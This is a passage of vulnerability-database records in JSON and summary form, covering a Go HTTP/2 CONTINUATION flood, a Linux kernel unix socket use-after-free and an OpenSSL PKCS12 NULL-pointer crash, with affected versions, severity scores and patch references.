{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:21:15.329Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://go.dev/issue/65051" }, { "tags": [ "x_transferred" ], "url": "https://go.dev/cl/576155" }, { "tags": [ "x_transferred" ], "url": "https://groups.google.com/g/golang-announce/c/YgW0sx8mN3M" }, { "tags": [ "x_transferred" ], "url": "https://pkg.go.dev/vuln/GO-2024-2687" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240419-0009/" }, { "tags": [ "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QRYFHIQ6XRKRYBI2F5UESH67BJBQXUPT/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/05/4" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/04/03/16" } ], "title": "CVE Program Container" }, { "affected": [ { "cpes": [ "cpe:2.3:a:go_standard_library:net\\/http:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "net\\/http", "vendor": "go_standard_library", "versions": [ { "lessThan": "1.21.9", "status": "affected", "version": "0", "versionType": "custom" }, { "lessThan": "1.22.2", "status": "affected", "version": "1.22.0-0", "versionType": "custom" } ] }, { "cpes": [ "cpe:2.3:a:golang:http2:*:*:*:*:*:*:*:*" ], "defaultStatus": "unknown", "product": "http2", "vendor": "golang", "versions": [ { "lessThan": "0.23.0", "status": "affected", "version": "0", "versionType": "custom" } ] } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-45288", "options": [ { "Exploitation": "none" }, { "Automatable": "yes" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-04-05T17:08:42.212936Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-08-26T20:40:01.996Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "net/http", "product": "net/http", "programRoutines": [ { "name": "http2Framer.readMetaFrame" }, { "name": "CanonicalHeaderKey" }, { "name": "Client.CloseIdleConnections" }, { "name": "Client.Do" }, { "name": "Client.Get" }, { "name": "Client.Head" }, { "name": "Client.Post" }, { "name": "Client.PostForm" }, { "name": "Cookie.String" }, { "name": "Cookie.Valid" }, { "name": "Dir.Open" }, { "name": "Error" }, { "name": "Get" }, { "name": "HandlerFunc.ServeHTTP" }, { "name": "Head" }, { "name": "Header.Add" }, { "name": "Header.Del" }, { "name": "Header.Get" }, { "name": "Header.Set" }, { "name": "Header.Values" }, { "name": "Header.Write" }, { "name": "Header.WriteSubset" }, { "name": "ListenAndServe" }, { "name": "ListenAndServeTLS" }, { "name": "NewRequest" }, { "name": "NewRequestWithContext" }, { "name": "NotFound" }, { "name": "ParseTime" }, { "name": "Post" }, { "name": "PostForm" }, { "name": "ProxyFromEnvironment" }, { "name": "ReadRequest" }, { "name": "ReadResponse" }, { "name": "Redirect" }, { "name": "Request.AddCookie" }, { "name": "Request.BasicAuth" }, { "name": "Request.FormFile" }, { "name": "Request.FormValue" }, { "name": "Request.MultipartReader" }, { "name": "Request.ParseForm" }, { "name": "Request.ParseMultipartForm" }, { "name": "Request.PostFormValue" }, { "name": "Request.Referer" }, { "name": "Request.SetBasicAuth" }, { "name": "Request.UserAgent" }, { "name": "Request.Write" }, { "name": "Request.WriteProxy" }, { "name": "Response.Cookies" }, { "name": "Response.Location" }, { "name": "Response.Write" }, { "name": "ResponseController.EnableFullDuplex" }, { "name": "ResponseController.Flush" }, { "name": "ResponseController.Hijack" }, { "name": "ResponseController.SetReadDeadline" }, { "name": "ResponseController.SetWriteDeadline" }, { "name": "Serve" }, { "name": "ServeContent" }, { "name": "ServeFile" }, { "name": "ServeMux.ServeHTTP" }, { "name": "ServeTLS" }, { "name": "Server.Close" }, { "name": "Server.ListenAndServe" }, { "name": "Server.ListenAndServeTLS" }, { "name": "Server.Serve" }, { "name": "Server.ServeTLS" }, { "name": "Server.SetKeepAlivesEnabled" }, { "name": "Server.Shutdown" }, { "name": "SetCookie" }, { "name": "Transport.CancelRequest" }, { "name": "Transport.Clone" }, { "name": "Transport.CloseIdleConnections" }, { "name": "Transport.RoundTrip" }, { "name": "body.Close" }, { "name": "body.Read" }, { "name": "bodyEOFSignal.Close" }, { "name": "bodyEOFSignal.Read" }, { "name": "bodyLocked.Read" }, { "name": "bufioFlushWriter.Write" }, { "name": "cancelTimerBody.Close" }, { "name": "cancelTimerBody.Read" }, { "name": "checkConnErrorWriter.Write" }, { "name": "chunkWriter.Write" }, { "name": "connReader.Read" }, { "name": "connectMethodKey.String" }, { "name": "expectContinueReader.Close" }, { "name": "expectContinueReader.Read" }, { "name": "extraHeader.Write" }, { "name": "fileHandler.ServeHTTP" }, { "name": "fileTransport.RoundTrip" }, { "name": "globalOptionsHandler.ServeHTTP" }, { "name": "gzipReader.Close" }, { "name": "gzipReader.Read" }, { "name": "http2ClientConn.Close" }, { "name": "http2ClientConn.Ping" }, { "name": "http2ClientConn.RoundTrip" }, { "name": "http2ClientConn.Shutdown" }, { "name": "http2ConnectionError.Error" }, { "name": "http2ErrCode.String" }, { "name": "http2FrameHeader.String" }, { "name": "http2FrameType.String" }, { "name": "http2FrameWriteRequest.String" }, { "name": "http2Framer.ReadFrame" }, { "name": "http2Framer.WriteContinuation" }, { "name": "http2Framer.WriteData" }, { "name": "http2Framer.WriteDataPadded" }, { "name": "http2Framer.WriteGoAway" }, { "name": "http2Framer.WriteHeaders" }, { "name": "http2Framer.WritePing" }, { "name": "http2Framer.WritePriority" }, { "name": "http2Framer.WritePushPromise" }, { "name": "http2Framer.WriteRSTStream" }, { "name": "http2Framer.WriteRawFrame" }, { "name": "http2Framer.WriteSettings" }, { "name": "http2Framer.WriteSettingsAck" }, { "name": "http2Framer.WriteWindowUpdate" }, { "name": "http2GoAwayError.Error" }, { "name": "http2Server.ServeConn" }, { "name": "http2Setting.String" }, { "name": "http2SettingID.String" }, { "name": "http2SettingsFrame.ForeachSetting" }, { "name": "http2StreamError.Error" }, { "name": "http2Transport.CloseIdleConnections" }, { "name": "http2Transport.NewClientConn" }, { "name": "http2Transport.RoundTrip" }, { "name": "http2Transport.RoundTripOpt" }, { "name": "http2bufferedWriter.Flush" }, { "name": "http2bufferedWriter.Write" }, { "name": "http2chunkWriter.Write" }, { "name": "http2clientConnPool.GetClientConn" }, { "name": "http2connError.Error" }, { "name": "http2dataBuffer.Read" }, { "name": "http2duplicatePseudoHeaderError.Error" }, { "name": "http2gzipReader.Close" }, { "name": "http2gzipReader.Read" }, { "name": "http2headerFieldNameError.Error" }, { "name": "http2headerFieldValueError.Error" }, { "name": "http2noDialClientConnPool.GetClientConn" }, { "name": "http2noDialH2RoundTripper.RoundTrip" }, { "name": "http2pipe.Read" }, { "name": "http2priorityWriteScheduler.CloseStream" }, { "name": "http2priorityWriteScheduler.OpenStream" }, { "name": "http2pseudoHeaderError.Error" }, { "name": "http2requestBody.Close" }, { "name": "http2requestBody.Read" }, { "name": "http2responseWriter.Flush" }, { "name": "http2responseWriter.FlushError" }, { "name": "http2responseWriter.Push" }, { "name": "http2responseWriter.SetReadDeadline" }, { "name": "http2responseWriter.SetWriteDeadline" }, { "name": "http2responseWriter.Write" }, { "name": "http2responseWriter.WriteHeader" }, { "name": "http2responseWriter.WriteString" }, { "name": "http2roundRobinWriteScheduler.OpenStream" }, { "name": "http2serverConn.CloseConn" }, { "name": "http2serverConn.Flush" }, { "name": "http2stickyErrWriter.Write" }, { "name": "http2transportResponseBody.Close" }, { "name": "http2transportResponseBody.Read" }, { "name": "http2writeData.String" }, { "name": "initALPNRequest.ServeHTTP" }, { "name": "loggingConn.Close" }, { "name": "loggingConn.Read" }, { "name": "loggingConn.Write" }, { "name": "maxBytesReader.Close" }, { "name": "maxBytesReader.Read" }, { "name": "onceCloseListener.Close" }, { "name": "persistConn.Read" }, { "name": "persistConnWriter.ReadFrom" }, { "name": "persistConnWriter.Write" }, { "name": "populateResponse.Write" }, { "name": "populateResponse.WriteHeader" }, { "name": "readTrackingBody.Close" }, { "name": "readTrackingBody.Read" }, { "name": "readWriteCloserBody.Read" }, { "name": "redirectHandler.ServeHTTP" }, { "name": "response.Flush" }, { "name": "response.FlushError" }, { "name": "response.Hijack" }, { "name": "response.ReadFrom" }, { "name": "response.Write" }, { "name": "response.WriteHeader" }, { "name": "response.WriteString" }, { "name": "serverHandler.ServeHTTP" }, { "name": "socksDialer.DialWithConn" }, { "name": "socksUsernamePassword.Authenticate" }, { "name": "stringWriter.WriteString" }, { "name": "timeoutHandler.ServeHTTP" }, { "name": "timeoutWriter.Write" }, { "name": "timeoutWriter.WriteHeader" }, { "name": "transportReadFromServerError.Error" } ], "vendor": "Go standard library", "versions": [ { "lessThan": "1.21.9", "status": "affected", "version": "0", "versionType": "semver" }, { "lessThan": "1.22.2", "status": "affected", "version": "1.22.0-0", "versionType": "semver" } ] }, { "collectionURL": "https://pkg.go.dev", "defaultStatus": "unaffected", "packageName": "golang.org/x/net/http2", "product": "golang.org/x/net/http2", "programRoutines": [ { "name": "Framer.readMetaFrame" }, { "name": "ClientConn.Close" }, { "name": "ClientConn.Ping" }, { "name": "ClientConn.RoundTrip" }, { "name": "ClientConn.Shutdown" }, { "name": "ConfigureServer" }, { "name": "ConfigureTransport" }, { "name": "ConfigureTransports" }, { "name": "ConnectionError.Error" }, { "name": "ErrCode.String" }, { "name": "FrameHeader.String" }, { "name": "FrameType.String" }, { "name": "FrameWriteRequest.String" }, { "name": "Framer.ReadFrame" }, { "name": "Framer.WriteContinuation" }, { "name": "Framer.WriteData" }, { "name": "Framer.WriteDataPadded" }, { "name": "Framer.WriteGoAway" }, { "name": "Framer.WriteHeaders" }, { "name": "Framer.WritePing" }, { "name": "Framer.WritePriority" }, { "name": "Framer.WritePushPromise" }, { "name": "Framer.WriteRSTStream" }, { "name": "Framer.WriteRawFrame" }, { "name": "Framer.WriteSettings" }, { "name": "Framer.WriteSettingsAck" }, { "name": "Framer.WriteWindowUpdate" }, { "name": "GoAwayError.Error" }, { "name": "ReadFrameHeader" }, { "name": "Server.ServeConn" }, { "name": "Setting.String" }, { "name": "SettingID.String" }, { "name": "SettingsFrame.ForeachSetting" }, { "name": "StreamError.Error" }, { "name": "Transport.CloseIdleConnections" }, { "name": "Transport.NewClientConn" }, { "name": "Transport.RoundTrip" }, { "name": "Transport.RoundTripOpt" }, { "name": "bufferedWriter.Flush" }, { "name": "bufferedWriter.Write" }, { "name": "chunkWriter.Write" }, { "name": "clientConnPool.GetClientConn" }, { "name": "connError.Error" }, { "name": "dataBuffer.Read" }, { "name": "duplicatePseudoHeaderError.Error" }, { "name": "gzipReader.Close" }, { "name": "gzipReader.Read" }, { "name": "headerFieldNameError.Error" }, { "name": "headerFieldValueError.Error" }, { "name": "noDialClientConnPool.GetClientConn" }, { "name": "noDialH2RoundTripper.RoundTrip" }, { "name": "pipe.Read" }, { "name": "priorityWriteScheduler.CloseStream" }, { "name": "priorityWriteScheduler.OpenStream" }, { "name": "pseudoHeaderError.Error" }, { "name": "requestBody.Close" }, { "name": "requestBody.Read" }, { "name": "responseWriter.Flush" }, { "name": "responseWriter.FlushError" }, { "name": "responseWriter.Push" }, { "name": "responseWriter.SetReadDeadline" }, { "name": "responseWriter.SetWriteDeadline" }, { "name": "responseWriter.Write" }, { "name": "responseWriter.WriteHeader" }, { "name": "responseWriter.WriteString" }, { "name": "roundRobinWriteScheduler.OpenStream" }, { "name": "serverConn.CloseConn" }, { "name": "serverConn.Flush" }, { "name": "stickyErrWriter.Write" }, { "name": "transportResponseBody.Close" }, { "name": "transportResponseBody.Read" }, { "name": "writeData.String" } ], "vendor": "golang.org/x/net", "versions": [ { "lessThan": "0.23.0", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "value": "Bartek Nowotarski (https://nowotarski.info/)" } ], "descriptions": [ { "lang": "en", "value": "An attacker may cause an HTTP/2 endpoint to read arbitrary amounts of header data by sending an excessive number of CONTINUATION frames. Maintaining HPACK state requires parsing and processing all HEADERS and CONTINUATION frames on a connection. When a request\u0027s headers exceed MaxHeaderBytes, no memory is allocated to store the excess headers, but they are still parsed. This permits an attacker to cause an HTTP/2 endpoint to read arbitrary amounts of header data, all associated with a request which is going to be rejected. These headers can include Huffman-encoded data which is significantly more expensive for the receiver to decode than for an attacker to send. The fix sets a limit on the amount of excess header frames we will process before closing a connection." } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-400: Uncontrolled Resource Consumption", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2024-04-04T20:37:30.714Z", "orgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "shortName": "Go" }, "references": [ { "url": "https://go.dev/issue/65051" }, { "url": "https://go.dev/cl/576155" }, { "url": "https://groups.google.com/g/golang-announce/c/YgW0sx8mN3M" }, { "url": "https://pkg.go.dev/vuln/GO-2024-2687" }, { "url": "https://security.netapp.com/advisory/ntap-20240419-0009/" }, { "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QRYFHIQ6XRKRYBI2F5UESH67BJBQXUPT/" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/05/4" }, { "url": "http://www.openwall.com/lists/oss-security/2024/04/03/16" } ], "title": "HTTP/2 CONTINUATION flood in net/http" } }, "cveMetadata": { "assignerOrgId": "1bb62c36-49e3-4200-9d77-64a1400537cc", "assignerShortName": "Go", "cveId": "CVE-2023-45288", "datePublished": "2024-04-04T20:37:30.714Z", "dateReserved": "2023-10-06T17:06:26.221Z", "dateUpdated": "2024-08-26T20:40:01.996Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6531
Vulnerability from cvelistv5
Published
2024-01-21 10:01
Modified
2024-11-23 00:24
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in the Linux Kernel due to a race problem in the unix garbage collector's deletion of SKB races with unix_stream_read_generic() on the socket that the SKB is queued on.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:2394 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-6531 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2253034 | issue-tracking, x_refsource_REDHAT | |
https://lore.kernel.org/all/c716c88321939156909cfa1bd8b0faaf1c804103.1701868795.git.asml.silence@gmail.com/ |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | Red Hat | Red Hat Enterprise Linux 9 |
Unaffected: 0:5.14.0-427.13.1.el9_4 < * cpe:/o:redhat:enterprise_linux:9::baseos cpe:/a:redhat:enterprise_linux:9::appstream cpe:/a:redhat:enterprise_linux:9::realtime cpe:/a:redhat:enterprise_linux:9::crb cpe:/a:redhat:enterprise_linux:9::nfv |
||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:35:14.711Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6531" }, { "name": "RHBZ#2253034", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253034" }, { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/all/c716c88321939156909cfa1bd8b0faaf1c804103.1701868795.git.asml.silence@gmail.com/" } ], "title": "CVE Program Container" }, { "metrics": [ { "other": { "content": { "id": "CVE-2023-6531", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-01-23T16:22:59.245640Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-10-21T11:04:02.176Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/a:redhat:enterprise_linux:9::crb", "cpe:/a:redhat:enterprise_linux:9::nfv" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-427.13.1.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-12-06T06:30:00+00:00", "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in the Linux Kernel due to a race problem in the unix garbage collector\u0027s deletion of SKB races with unix_stream_read_generic() on the socket that the SKB is queued on." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-362", "description": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-23T00:24:27.253Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:2394", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2394" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-6531" }, { "name": "RHBZ#2253034", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253034" }, { "url": "https://lore.kernel.org/all/c716c88321939156909cfa1bd8b0faaf1c804103.1701868795.git.asml.silence@gmail.com/" } ], "timeline": [ { "lang": "en", "time": "2023-12-05T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-12-06T06:30:00+00:00", "value": "Made public." } ], "title": "Kernel: gc\u0027s deletion of an skb races with unix_stream_read_generic() leading to uaf", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-6531", "datePublished": "2024-01-21T10:01:07.215Z", "dateReserved": "2023-12-05T18:05:12.324Z", "dateUpdated": "2024-11-23T00:24:27.253Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-0727
Vulnerability from cvelistv5
Published
2024-01-26 08:57
Modified
2024-10-14 14:55
Severity ?
EPSS score ?
Summary
Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL
to crash leading to a potential Denial of Service attack
Impact summary: Applications loading files in the PKCS12 format from untrusted
sources might terminate abruptly.
A file in PKCS12 format can contain certificates and keys and may come from an
untrusted source. The PKCS12 specification allows certain fields to be NULL, but
OpenSSL does not correctly check for this case. This can lead to a NULL pointer
dereference that results in OpenSSL crashing. If an application processes PKCS12
files from an untrusted source using the OpenSSL APIs then that application will
be vulnerable to this issue.
OpenSSL APIs that are vulnerable to this are: PKCS12_parse(),
PKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes()
and PKCS12_newpass().
We have also fixed a similar issue in SMIME_write_PKCS7(). However since this
function is related to writing data we do not consider it security significant.
The FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-01T18:18:17.369Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20240125.txt" }, { "name": "3.2.1 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://github.com/openssl/openssl/commit/775acfdbd0c6af9ac855f34969cdab0c0c90844a" }, { "name": "3.1.5 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c" }, { "name": "3.0.13 git commit", "tags": [ "patch", "x_transferred" ], "url": "https://github.com/openssl/openssl/commit/09df4395b5071217b76dc7d3d2e630eb8c5a79c2" }, { "name": "1.1.1x git commit", "tags": [ "patch", "x_transferred" ], "url": "https://github.openssl.org/openssl/extended-releases/commit/03b3941d60c4bce58fab69a0c22377ab439bc0e8" }, { "name": "1.0.2zj git commit", "tags": [ "patch", "x_transferred" ], "url": "https://github.openssl.org/openssl/extended-releases/commit/aebaa5883e31122b404e450732dc833dc9dee539" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20240208-0006/" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/11/1" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "lessThan": "3.2.1", "status": "affected", "version": "3.2.0", "versionType": "semver" }, { "lessThan": "3.1.5", "status": "affected", "version": "3.1.0", "versionType": "semver" }, { "lessThan": "3.0.13", "status": "affected", "version": "3.0.0", "versionType": "semver" }, { "lessThan": "1.1.1x", "status": "affected", "version": "1.1.1", "versionType": "custom" }, { "lessThan": "1.0.2zj", "status": "affected", "version": "1.0.2", "versionType": "custom" } ] } ], "credits": [ { "lang": "en", "type": "finder", "user": "00000000-0000-4000-9000-000000000000", "value": "Bahaa Naamneh (Crosspoint Labs)" }, { "lang": "en", "type": "remediation developer", "user": "00000000-0000-4000-9000-000000000000", "value": "Matt Caswell" } ], "datePublic": "2024-01-25T00:00:00.000Z", "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL\u003cbr\u003eto crash leading to a potential Denial of Service attack\u003cbr\u003e\u003cbr\u003eImpact summary: Applications loading files in the PKCS12 format from untrusted\u003cbr\u003esources might terminate abruptly.\u003cbr\u003e\u003cbr\u003eA file in PKCS12 format can contain certificates and keys and may come from an\u003cbr\u003euntrusted source. The PKCS12 specification allows certain fields to be NULL, but\u003cbr\u003eOpenSSL does not correctly check for this case. This can lead to a NULL pointer\u003cbr\u003edereference that results in OpenSSL crashing. If an application processes PKCS12\u003cbr\u003efiles from an untrusted source using the OpenSSL APIs then that application will\u003cbr\u003ebe vulnerable to this issue.\u003cbr\u003e\u003cbr\u003eOpenSSL APIs that are vulnerable to this are: PKCS12_parse(),\u003cbr\u003ePKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes()\u003cbr\u003eand PKCS12_newpass().\u003cbr\u003e\u003cbr\u003eWe have also fixed a similar issue in SMIME_write_PKCS7(). However since this\u003cbr\u003efunction is related to writing data we do not consider it security significant.\u003cbr\u003e\u003cbr\u003eThe FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue." } ], "value": "Issue summary: Processing a maliciously formatted PKCS12 file may lead OpenSSL\nto crash leading to a potential Denial of Service attack\n\nImpact summary: Applications loading files in the PKCS12 format from untrusted\nsources might terminate abruptly.\n\nA file in PKCS12 format can contain certificates and keys and may come from an\nuntrusted source. The PKCS12 specification allows certain fields to be NULL, but\nOpenSSL does not correctly check for this case. This can lead to a NULL pointer\ndereference that results in OpenSSL crashing. If an application processes PKCS12\nfiles from an untrusted source using the OpenSSL APIs then that application will\nbe vulnerable to this issue.\n\nOpenSSL APIs that are vulnerable to this are: PKCS12_parse(),\nPKCS12_unpack_p7data(), PKCS12_unpack_p7encdata(), PKCS12_unpack_authsafes()\nand PKCS12_newpass().\n\nWe have also fixed a similar issue in SMIME_write_PKCS7(). However since this\nfunction is related to writing data we do not consider it security significant.\n\nThe FIPS modules in 3.2, 3.1 and 3.0 are not affected by this issue." } ], "metrics": [ { "format": "other", "other": { "content": { "text": "Low" }, "type": "https://www.openssl.org/policies/secpolicy.html" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476 NULL Pointer Dereference", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-10-14T14:55:58.371Z", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "name": "OpenSSL Advisory", "tags": [ "vendor-advisory" ], "url": "https://www.openssl.org/news/secadv/20240125.txt" }, { "name": "3.2.1 git commit", "tags": [ "patch" ], "url": "https://github.com/openssl/openssl/commit/775acfdbd0c6af9ac855f34969cdab0c0c90844a" }, { "name": "3.1.5 git commit", "tags": [ "patch" ], "url": "https://github.com/openssl/openssl/commit/d135eeab8a5dbf72b3da5240bab9ddb7678dbd2c" }, { "name": "3.0.13 git commit", "tags": [ "patch" ], "url": "https://github.com/openssl/openssl/commit/09df4395b5071217b76dc7d3d2e630eb8c5a79c2" }, { "name": "1.1.1x git commit", "tags": [ "patch" ], "url": "https://github.openssl.org/openssl/extended-releases/commit/03b3941d60c4bce58fab69a0c22377ab439bc0e8" }, { "name": "1.0.2zj git commit", "tags": [ "patch" ], "url": "https://github.openssl.org/openssl/extended-releases/commit/aebaa5883e31122b404e450732dc833dc9dee539" } ], "source": { "discovery": "UNKNOWN" }, "title": "PKCS12 Decoding crashes", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2024-0727", "datePublished": "2024-01-26T08:57:19.579Z", "dateReserved": "2024-01-19T11:01:11.010Z", "dateUpdated": "2024-10-14T14:55:58.371Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-39189
Vulnerability from cvelistv5
Published
2023-10-09 17:57
Modified
2024-11-15 17:03
Severity ?
